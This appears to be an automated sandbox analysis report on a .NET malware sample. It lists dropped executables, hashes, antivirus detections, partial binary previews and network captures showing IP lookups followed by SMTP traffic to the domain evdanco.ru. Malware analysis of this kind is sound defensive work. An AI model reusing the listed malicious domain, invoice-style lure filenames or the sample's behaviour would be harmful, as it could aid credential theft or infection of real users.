                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\

                                                      C:\Users\user\AppData\Local\Temp\watchdog.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\ACID.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:modified
                                                      Size (bytes):78336
                                                      Entropy (8bit):4.369296705546591
                                                      Encrypted:false
                                                      SSDEEP:768:jlU4+MS3Fu0thSOV4GM0SuHk9Oh/1TRIWUk7NlfaNV9KQLxXXSv:l6o03IGMLuHk+Ck5lfaNP7xSv
                                                      MD5:0E362E7005823D0BEC3719B902ED6D62
                                                      SHA1:590D860B909804349E0CDC2F1662B37BD62F7463
                                                      SHA-256:2D0DC6216F613AC7551A7E70A798C22AEE8EB9819428B1357E2B8C73BEF905AD
                                                      SHA-512:518991B68496B3F8545E418CF9B345E0791E09CC20D177B8AA47E0ABA447AA55383C64F5BDACA39F2B061A5D08C16F2AD484AF8A9F238CA23AB081618FBA3AD3
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 83%
                                                      Joe Sandbox View:
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: Approved_Invoice_0000384834.exe, Detection: malicious, Browse
                                                      • Filename: po-544-8370.exe, Detection: malicious, Browse
                                                      • Filename: Approved PO.exe, Detection: malicious, Browse
                                                      • Filename: SO-0093848222.exe, Detection: malicious, Browse
                                                      • Filename: LLC_KHIMAKTIV_SOFT_Po_Official_2023.exe, Detection: malicious, Browse
                                                      • Filename: SO-x-008387489.exe, Detection: malicious, Browse
                                                      • Filename: IB7QP60Fdx.exe, Detection: malicious, Browse
                                                      • Filename: Quote_for_order.exe, Detection: malicious, Browse
                                                      • Filename: PO_No.254990-81723.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y ................P..&...........D... ........@.. ....................................`..................................D..W....`..............................hD............................................... ............... ..H............text....$... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............0..............@..B.................D......H.......l....%......)....................................................0..6.......(8...t....&.(8...t....&......(8...t...................8;....8%.....(8...t....&.(8...t............:.....(8...t....:.....(8...t....:....(8...t....................................\:@....(8...t....&.)...&8.....(8...t....&(8...t....&.....:.......8x........:L...88....(8...t....&(8...t....&(8...t....&(8...t.....................:....8!.....(8...t....&......(8...t....&.....(8...t....:8.....(8...t....&.

                                                      C:\Users\user\AppData\Local\Temp\watchdog.txt

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\ACID.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):56
                                                      Entropy (8bit):4.662016252639432
                                                      Encrypted:false
                                                      SSDEEP:3:ACgNN+EaKC5Yk9E9v:AVN7aZ5YYAv
                                                      MD5:8F7D92D744BB2B5D48C24AEFD74A47EC
                                                      SHA1:087CAF6B9AC7C4DE85B9CE4E1ABDFDE6607204B6
                                                      SHA-256:5B6C29EBC590C9E7C18C4C2020EFC6376BF0459B81A5A095348A752D94B758DE
                                                      SHA-512:152BCD7FA15F5CF4DF8C07D8AB1586D1838128AEBFEC7E64B37499104FFEC76318AEBC6849C8C5E4B42C8804A4433305A4CAE793474A1A72204538DFFE104771
                                                      Malicious:false
                                                      Preview:6900..C:\Users\user\AppData\Roaming\ACID.exe..1832..

                                                      C:\Users\user\AppData\Roaming\ACID.exe

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2652672
                                                      Entropy (8bit):7.720198202140557
                                                      Encrypted:false
                                                      SSDEEP:49152:4To7KY/EhaBB4q38SQxZTC7YXepIt8RAF5IVITPqc6:4M7j38/+eoAjI6PL
                                                      MD5:043B9D0DE6BAD8FC4B4722987348329E
                                                      SHA1:6A344981C065F19B15736A0ED7AFE92DA6EF3CC0
                                                      SHA-256:466B1CF9BAE2D35D18DD3C8C9944861D770BF0DDA89BB535D5566F12D7CCD11D
                                                      SHA-512:D117646DE639D03A098063F33ED7323AA81D3A741477F982AE7A17384DDBFA392FBDDBCFE8721E3E3F99B97C098205E49B0D2352DB529933842EE7C69678920B
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y..%.................h'...........'.. ....'...@.. ........................(...........`.................................d.'.W.....'.......................(...................................................... ............... ..H............text....g'.. ...h'................. ..`.rsrc.........'......j'.............@..@.reloc........(......x(.............@..B..................'.....H........*'.L]......8.......4'&.........................................}r|r}r.n.F.F.F.Pta.p.G.j.\.`-Z.PFa.p.G.j.\.`*Z.Pea.p.G.j.\.`0Z(Pna.p.GV$J$T$....b%,.C>"..8.2..%. %h.K>?..8.2..&.*%b..>/..8.2....n%0.J?.?I?..c.~>0._%>..#.)..9.<>t.W%#..#.)..:.6>~..%3..#.)..c.~>1..%[..#.)..n.4>y.Z%?..#.)..-.<>d..%?..#.)..%.!>q.Q%|..#.)..`.1>f..%X..#.)..<.'>-.Y%'..#.)..:.&>q.5%[..#.)..:.n>w.R%8..#.)..#.&>~.5%[..#.).. .<>s..%2..#.).. .$>..X%:..#.)..c.'>u.R%...#.)..c.~>1..%m.i.i.....V.U.....

                                                      C:\Users\user\AppData\Roaming\ACID.exe:Zone.Identifier

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                      C:\Users\user\AppData\Roaming\VsUPptm\VsUPptm.exe

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:modified
                                                      Size (bytes):42064
                                                      Entropy (8bit):6.19564898727408
                                                      Encrypted:false
                                                      SSDEEP:384:qtpFVLK0MsihB9VKS7xdgl6KJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+RPZTg:GBMs2SqdSZ6Iq8BxTfqWR8h7ukP
                                                      MD5:5D4073B2EB6D217C19F2B22F21BF8D57
                                                      SHA1:F0209900FBF08D004B886A0B3BA33EA2B0BF9DA8
                                                      SHA-256:AC1A3F21FCC88F9CEE7BF51581EAFBA24CC76C924F0821DEB2AFDF1080DDF3D3
                                                      SHA-512:9AC94880684933BA3407CDC135ABC3047543436567AF14CD9269C4ADC5A6535DB7B867D6DE0D6238A21B94E69F9890DBB5739155871A624520623A7E56872159
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,>.]..............0..T...........r... ........@.. ....................................`.................................4r..O....................b..PB...........p............................................... ............... ..H............text....R... ...T.................. ..`.rsrc................V..............@..@.reloc...............`..............@..B................hr......H........"..|J..........lm.......o......................................2~.....o....*.r...p(....*VrK..p(....s.........*..0..........(....(....o....o....(....o.... .....T(....o....(....o....o ...o!....4(....o....(....o....o ...o".....(....rm..ps#...o....($........(%....o&....ry..p......%.r...p.%.(.....(....('....((.......o)...('........*.*................"..(*...*..{Q...-...}Q.....(+...(....(,....(+...*"..(-...*..(....*..(.....r...p.(/...o0...s....}T...*....0.. .......~S...-.s

                                                      \Device\Null

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\PING.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1607
                                                      Entropy (8bit):4.76085226484577
                                                      Encrypted:false
                                                      SSDEEP:12:PKMRJpTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeTeT0sR:/ZTAokItULVDv
                                                      MD5:5040A956CEED74BBC4F0ED871791EA24
                                                      SHA1:E99982033A3263C3D69FE812A23E1F59F0CDDDC2
                                                      SHA-256:0871CCAE12C6B67BB8E64760D4850125AE4744A508CCA5A55A7A90813E53CF02
                                                      SHA-512:834C9885244E4AD260FF322E1437676D1672DC40BF907D4A3D796D348FF612951C963BA52B1C23163EDEEAEA51DBA262C3EC7EF9F063D5AC612D2AFF6B366D6A
                                                      Malicious:false
                                                      Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: byt

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.720198202140557
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:image.exe
                                                      File size:2'652'672 bytes
                                                      MD5:043b9d0de6bad8fc4b4722987348329e
                                                      SHA1:6a344981c065f19b15736a0ed7afe92da6ef3cc0
                                                      SHA256:466b1cf9bae2d35d18dd3c8c9944861d770bf0dda89bb535d5566f12d7ccd11d
                                                      SHA512:d117646de639d03a098063f33ed7323aa81d3a741477f982ae7a17384ddbfa392fbddbcfe8721e3e3f99b97c098205e49b0d2352db529933842ee7c69678920b
                                                      SSDEEP:49152:4To7KY/EhaBB4q38SQxZTC7YXepIt8RAF5IVITPqc6:4M7j38/+eoAjI6PL
                                                      TLSH:2DC523471F83B868D00889731025799C5375ACAE7EDAEB0B99DC33E4C77B6EAD716012
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y..%.................h'...........'.. ....'...@.. ........................(...........`................................

                                                      File Icon

                                                      Icon Hash:443ad8d4dc581348

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x6787be
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x25A88459 [Mon Jan 8 12:15:21 1990 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2787640x57.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x27a0000x10c90.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x28c0000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x2767c40x276800dabb49eaee48ea4311a2e17fab4dfb56unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x27a0000x10c900x10e00e3e2dfd63a2cccfa16a07fb679912783False0.058492476851851855data3.143485306165341IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x28c0000xc0x20076fba4a48f46b6631a67107c1e2be166False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0x27a0e80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m0.05199337513308885
                                                      RT_GROUP_ICON0x28a9100x14data1.25
                                                      RT_VERSION0x28a9240x36cdata0.4554794520547945

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Aug 13, 2024 16:31:37.798643112 CEST49727443192.168.2.6104.26.13.205
                                                      Aug 13, 2024 16:31:37.798695087 CEST44349727104.26.13.205192.168.2.6
                                                      Aug 13, 2024 16:31:37.798780918 CEST49727443192.168.2.6104.26.13.205
                                                      Aug 13, 2024 16:31:37.806097984 CEST49727443192.168.2.6104.26.13.205
                                                      Aug 13, 2024 16:31:37.806113005 CEST44349727104.26.13.205192.168.2.6
                                                      Aug 13, 2024 16:31:38.289167881 CEST44349727104.26.13.205192.168.2.6
                                                      Aug 13, 2024 16:31:38.289335012 CEST49727443192.168.2.6104.26.13.205
                                                      Aug 13, 2024 16:31:38.292886019 CEST49727443192.168.2.6104.26.13.205
                                                      Aug 13, 2024 16:31:38.292897940 CEST44349727104.26.13.205192.168.2.6
                                                      Aug 13, 2024 16:31:38.293246031 CEST44349727104.26.13.205192.168.2.6
                                                      Aug 13, 2024 16:31:38.337229013 CEST49727443192.168.2.6104.26.13.205
                                                      Aug 13, 2024 16:31:38.367172003 CEST49727443192.168.2.6104.26.13.205
                                                      Aug 13, 2024 16:31:38.412499905 CEST44349727104.26.13.205192.168.2.6
                                                      Aug 13, 2024 16:31:38.480918884 CEST44349727104.26.13.205192.168.2.6
                                                      Aug 13, 2024 16:31:38.481040001 CEST44349727104.26.13.205192.168.2.6
                                                      Aug 13, 2024 16:31:38.481096029 CEST49727443192.168.2.6104.26.13.205
                                                      Aug 13, 2024 16:31:38.487479925 CEST49727443192.168.2.6104.26.13.205
                                                      Aug 13, 2024 16:31:38.499738932 CEST4972880192.168.2.6208.95.112.1
                                                      Aug 13, 2024 16:31:38.504786968 CEST8049728208.95.112.1192.168.2.6
                                                      Aug 13, 2024 16:31:38.504872084 CEST4972880192.168.2.6208.95.112.1
                                                      Aug 13, 2024 16:31:38.504981041 CEST4972880192.168.2.6208.95.112.1
                                                      Aug 13, 2024 16:31:38.510123014 CEST8049728208.95.112.1192.168.2.6
                                                      Aug 13, 2024 16:31:38.989346981 CEST8049728208.95.112.1192.168.2.6
                                                      Aug 13, 2024 16:31:39.040385962 CEST4972880192.168.2.6208.95.112.1
                                                      Aug 13, 2024 16:31:40.385377884 CEST4972880192.168.2.6208.95.112.1
                                                      Aug 13, 2024 16:31:40.390892982 CEST8049728208.95.112.1192.168.2.6
                                                      Aug 13, 2024 16:31:40.390947104 CEST4972880192.168.2.6208.95.112.1
                                                      Aug 13, 2024 16:31:40.616519928 CEST49729587192.168.2.680.96.42.133
                                                      Aug 13, 2024 16:31:40.621500969 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:40.621593952 CEST49729587192.168.2.680.96.42.133
                                                      Aug 13, 2024 16:31:41.442847013 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:41.443054914 CEST49729587192.168.2.680.96.42.133
                                                      Aug 13, 2024 16:31:41.447990894 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:41.662904024 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:41.712227106 CEST49729587192.168.2.680.96.42.133
                                                      Aug 13, 2024 16:31:44.249110937 CEST49729587192.168.2.680.96.42.133
                                                      Aug 13, 2024 16:31:44.254575968 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:44.472996950 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:44.474015951 CEST49729587192.168.2.680.96.42.133
                                                      Aug 13, 2024 16:31:44.479088068 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:44.703231096 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:44.703253031 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:44.703269005 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:44.703318119 CEST49729587192.168.2.680.96.42.133
                                                      Aug 13, 2024 16:31:44.717674017 CEST49729587192.168.2.680.96.42.133
                                                      Aug 13, 2024 16:31:44.722682953 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:44.939100981 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:44.943552017 CEST49729587192.168.2.680.96.42.133
                                                      Aug 13, 2024 16:31:44.948477983 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:45.162867069 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:45.165613890 CEST49729587192.168.2.680.96.42.133
                                                      Aug 13, 2024 16:31:45.170506954 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:45.385308981 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:45.385584116 CEST49729587192.168.2.680.96.42.133
                                                      Aug 13, 2024 16:31:45.390453100 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:45.618469954 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:45.618711948 CEST49729587192.168.2.680.96.42.133
                                                      Aug 13, 2024 16:31:45.623811960 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:45.838720083 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:45.838990927 CEST49729587192.168.2.680.96.42.133
                                                      Aug 13, 2024 16:31:45.844079018 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:46.066063881 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:46.066240072 CEST49729587192.168.2.680.96.42.133
                                                      Aug 13, 2024 16:31:46.071130037 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:46.286251068 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:46.291043997 CEST49729587192.168.2.680.96.42.133
                                                      Aug 13, 2024 16:31:46.291088104 CEST49729587192.168.2.680.96.42.133
                                                      Aug 13, 2024 16:31:46.291116953 CEST49729587192.168.2.680.96.42.133
                                                      Aug 13, 2024 16:31:46.291126013 CEST49729587192.168.2.680.96.42.133
                                                      Aug 13, 2024 16:31:46.295931101 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:46.296828032 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:46.297535896 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:46.297547102 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:46.894510031 CEST5874972980.96.42.133192.168.2.6
                                                      Aug 13, 2024 16:31:46.946614981 CEST49729587192.168.2.680.96.42.133

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Aug 13, 2024 16:31:37.784745932 CEST5415853192.168.2.61.1.1.1
                                                      Aug 13, 2024 16:31:37.792290926 CEST53541581.1.1.1192.168.2.6
                                                      Aug 13, 2024 16:31:38.491343975 CEST6044353192.168.2.61.1.1.1
                                                      Aug 13, 2024 16:31:38.499052048 CEST53604431.1.1.1192.168.2.6
                                                      Aug 13, 2024 16:31:40.398565054 CEST6215253192.168.2.61.1.1.1
                                                      Aug 13, 2024 16:31:40.591859102 CEST53621521.1.1.1192.168.2.6

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Aug 13, 2024 16:31:37.784745932 CEST192.168.2.61.1.1.10x5ad4Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                      Aug 13, 2024 16:31:38.491343975 CEST192.168.2.61.1.1.10xdc69Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                      Aug 13, 2024 16:31:40.398565054 CEST192.168.2.61.1.1.10x575bStandard query (0)evdanco.ruA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Aug 13, 2024 16:31:37.792290926 CEST1.1.1.1192.168.2.60x5ad4No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                      Aug 13, 2024 16:31:37.792290926 CEST1.1.1.1192.168.2.60x5ad4No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                      Aug 13, 2024 16:31:37.792290926 CEST1.1.1.1192.168.2.60x5ad4No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                      Aug 13, 2024 16:31:38.499052048 CEST1.1.1.1192.168.2.60xdc69No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                      Aug 13, 2024 16:31:40.591859102 CEST1.1.1.1192.168.2.60x575bNo error (0)evdanco.ru80.96.42.133A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • api.ipify.org
                                                      • ip-api.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.649728208.95.112.1801112C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 13, 2024 16:31:38.504981041 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                      Host: ip-api.com
                                                      Connection: Keep-Alive
                                                      Aug 13, 2024 16:31:38.989346981 CEST175INHTTP/1.1 200 OK
                                                      Date: Tue, 13 Aug 2024 14:31:38 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 6
                                                      Access-Control-Allow-Origin: *
                                                      X-Ttl: 60
                                                      X-Rl: 44
                                                      Data Raw: 66 61 6c 73 65 0a
                                                      Data Ascii: false


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.649727104.26.13.2054431112C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-13 14:31:38 UTC155OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                      Host: api.ipify.org
                                                      Connection: Keep-Alive
                                                      2024-08-13 14:31:38 UTC211INHTTP/1.1 200 OK
                                                      Date: Tue, 13 Aug 2024 14:31:38 GMT
                                                      Content-Type: text/plain
                                                      Content-Length: 11
                                                      Connection: close
